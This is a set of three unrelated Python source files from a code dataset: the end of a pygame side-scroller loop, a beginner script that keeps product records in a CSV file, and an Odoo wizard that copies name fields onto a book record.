    if 12 > score > 5:
        speed = 10
        character.vel = 7
    if score > 12:
        speed = random.randrange(10, 18)
    # screen background color and images (two copies for seamless looping)
    screen.fill(WHITE)
    screen.blit(backgroundIMG, (BX, 0))
    screen.blit(backgroundIMG, (BX-800, 0))
    # all display draw calls: score, player, obstacle
    text=scorefont.render("Score: %d"%score,1,BLACK)
    screen.blit(text,(10,10))
    character.draw()
    screen.blit(car, (OX, OY))
    # detecting collision: collision() returns False on a hit
    if collision() is False:
        running = False
    # cap the frame rate at 60 FPS
    CLOCK.tick(60)
    # whole screen updating
    pygame.display.update()
    # brief pause on the first frame so the player can get ready
    if firsttime is True:
        time.sleep(1)
        firsttime = False
# linger one second (e.g. on the "You Lose!" banner) before closing
time.sleep(1)
pygame.quit()
quit()
| muhammadabdullah329/SideScollerPygame | sideScoller.py | sideScoller.py | py | 3,872 | python | en | code | 0 | github-code | 90 |
# Check whether the data file exists
import os # operating system utilities, used for the file-existence check
products = []  # list of [name, price] records
if os.path.isfile('products.csv'):
    print('yes')
    # Read the existing file
    with open('products.csv', 'r', encoding = 'utf-8') as f:
        for line in f:
            if '商品, 价格' in line:
                continue # skip the header row
            name , price = line.strip().split(',') # strip the newline first, then split on the comma
            products.append([name, price])
    print(products)
else:
    print('nope')
# Let the user enter new products ('q' to stop)
while True:
    name = input('请输入商品名称:')
    if name == 'q':
        break
    price = input('请输入商品价格:')
    price = int(price)
    p = []
    p.append(name) # inner (small) list
    p.append(price) # inner (small) list
    # The three lines above could be shortened to: p = [name, price]
    products.append(p) # outer (big) list: append the small list into the big one
    # Or even shortened directly to products.append([name, price])
    print(products)
# products[0][0] # slot 0 of the big list, slot 0 of the small list
# Print every purchase record
for p in products:
    print(p[0], '的价格是$', p[1])
# Write the records back to the file
with open('products.csv', 'w', encoding = 'utf-8') as f:
    # Write mode, so it is fine if products.csv does not exist yet
    # encoding = 'utf-8' avoids mojibake so the text stays readable
    # Saved as CSV so it opens in Excel (opening directly garbles Chinese;
    # use Data -> Get External Data -> From Text, choose UTF-8, comma-delimited)
    f.write('商品, 价格\n')
    for p in products:
        f.write(p[0] + ',' + str(p[1]) +'\n') # strings support + and *
        # but + only joins str with str (or int with int), hence str(p[1])
| ccpstcc4330/products | p.py | p.py | py | 1,549 | python | zh | code | 0 | github-code | 90 |
# -*- coding: utf-8 -*-
from odoo import fields, models, api
class ContextWizard(models.TransientModel):
    """Transient wizard that copies three name parts onto the active book.type record."""

    _name = "context.wizard"
    _description = "Context Wizard"

    # Name parts entered by the user in the wizard form.
    first_name = fields.Char(string="First Name")
    middle_name = fields.Char(string="Middle Name")
    last_name = fields.Char(string="Last Name")

    def action_confirm(self):
        """Write the wizard's name fields onto the record the wizard was opened from.

        The target book.type record id is taken from ``active_id`` in the context.
        """
        active_id = self._context.get("active_id")
        target = self.env["book.type"].search([("id", "=", active_id)])
        vals = {
            "first_name": self.first_name,
            "middle_name": self.middle_name,
            "last_name": self.last_name,
        }
        target.write(vals)
| muchhalaamit/custom_addons_15 | library_management/wizards/context_wizard.py | context_wizard.py | py | 669 | python | en | code | 0 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.